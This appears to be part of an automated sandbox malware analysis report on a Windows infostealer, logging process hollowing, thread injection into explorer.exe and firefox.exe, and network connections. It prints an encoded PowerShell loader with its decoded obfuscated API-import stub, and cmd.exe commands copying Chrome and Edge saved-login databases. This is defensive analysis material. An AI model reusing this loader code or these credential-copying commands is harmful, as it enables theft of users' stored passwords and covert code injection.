Source: C:\Windows\explorer.exe Network Connect: 199.15.163.148 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.251.39.115 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 13.248.216.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.39.116 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: C30000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6A8CE0000 Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Nels Parapsyk Antih Dudelsac desul Murphied Mldr Louthe Accumbentk Pectoralis Duvet Opsprtn neddies Udsving Analysea Faresglo Demar Bluebel Couridah offlic #Rullest Lachrymat Barythym Maris tolseykul Uudslukke Satsbille Alvidend Udgangsfor Vedga Ferielukn Reyk Chasser Equalli Forsten muski Unpeel Spekta Jungmandun indukt Isol Skelnemrk Dgnfl Folkere Afpasn Dally Landgangs Henriksen Molbohis Sanering Grutn Stakladern Arch $C32 = [char]34 + "Z" + "wA"+"ll"+"oc"+"ateVir"+"tualM"+"e"+"m"+"ory" + [char]34#Commanding underbe Aporr Unfutil Julianistb Bagkldning Seren Conv Osteopla Unprefera Samme Semispira Regensiane Fehso Skov Komplette Redse Disputdag Fauc Semi galact Noropianic Millisekun Begrebsd Kdfar Misogy Topforsp Cprf livsbeti Ordre Mldeinodo Eksamen Uddannelse Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Skyd1{[DllImport("kernel32.dll")]public static extern IntPtr EnumTimeFormatsA(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("kernel32.dll")]public static extern IntPtr CreatePipe(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("ntdll.dll", EntryPoint=$C32)]public static extern int Fida(int Skyd6,ref Int32 lndgh,int Derivativt,ref Int32 Skyd,int Rgende142,int Skyd7);[DllImport("kernel32.dll")]public static extern IntPtr GetFileTime(uint Derivativt5,int Derivativt6);}"@#borts Fygehent Ostindiefa Densificat Excel udenrigsm vasicentri Wineskinav Skibs
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Nels Parapsyk Antih Dudelsac desul Murphied Mldr Louthe Accumbentk Pectoralis Duvet Opsprtn neddies Udsving Analysea Faresglo Demar Bluebel Couridah offlic #Rullest Lachrymat Barythym Maris tolseykul Uudslukke Satsbille Alvidend Udgangsfor Vedga Ferielukn Reyk Chasser Equalli Forsten muski Unpeel Spekta Jungmandun indukt Isol Skelnemrk Dgnfl Folkere Afpasn Dally Landgangs Henriksen Molbohis Sanering Grutn Stakladern Arch $C32 = [char]34 + "Z" + "wA"+"ll"+"oc"+"ateVir"+"tualM"+"e"+"m"+"ory" + [char]34#Commanding underbe Aporr Unfutil Julianistb Bagkldning Seren Conv Osteopla Unprefera Samme Semispira Regensiane Fehso Skov Komplette Redse Disputdag Fauc Semi galact Noropianic Millisekun Begrebsd Kdfar Misogy Topforsp Cprf livsbeti Ordre Mldeinodo Eksamen Uddannelse Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Skyd1{[DllImport("kernel32.dll")]public static extern IntPtr EnumTimeFormatsA(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("kernel32.dll")]public static extern IntPtr CreatePipe(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("ntdll.dll", EntryPoint=$C32)]public static extern int Fida(int Skyd6,ref Int32 lndgh,int Derivativt,ref Int32 Skyd,int Rgende142,int Skyd7);[DllImport("kernel32.dll")]public static extern IntPtr GetFileTime(uint Derivativt5,int Derivativt6);}"@#borts Fygehent Ostindiefa Densificat Excel udenrigsm vasicentri Wineskinav Skibs Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6A8CE0000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Thread register set: target process: 4868 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Thread register set: target process: 4868 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4868 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA75.tmp" "c:\Users\user\AppData\Local\Temp\tmhd51lu\CSCDE243CA280D4B5C9E282790C554DB9.TMP" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3331890216.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3036040501.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3036040501.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: TProgram Manager
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3036040501.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.2889968847.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3162376915.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3030170625.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanver}
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
